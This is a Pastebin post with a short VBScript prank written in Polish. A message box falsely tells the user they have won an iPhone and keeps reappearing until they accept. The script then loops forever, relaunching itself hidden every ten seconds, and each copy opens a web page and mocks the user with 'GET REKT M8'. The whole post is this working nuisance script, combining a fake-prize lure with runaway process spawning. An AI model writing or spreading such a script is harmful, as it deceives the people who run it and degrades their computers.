Advertisement
Guest User

Untitled

a guest
Feb 11th, 2018
63
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. dim objShell
  2. Set objShell = wscript.createobject("wscript.shell")
  3.  
  4. if wscript.arguments.count = 0 then
  5.  
  6. dim Var
  7.  
  8. do while Var <> 6
  9. Var=Msgbox("Pobierz swojego iphona",vbYesNo,"Wygrałeś iphona!")
  10. Loop
  11.  
  12. if var = 6 then
  13. do while true
  14. objShell.run "script.vbs &1",0
  15. wscript.sleep 10000
  16. loop
  17. end if
  18.  
  19. else
  20.  
  21. objShell.run "https://pristinefarmexperience.files.wordpress.com/2013/03/goats.gif"
  22. msgbox("GET REKT M8")
  23.  
  24. end if
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement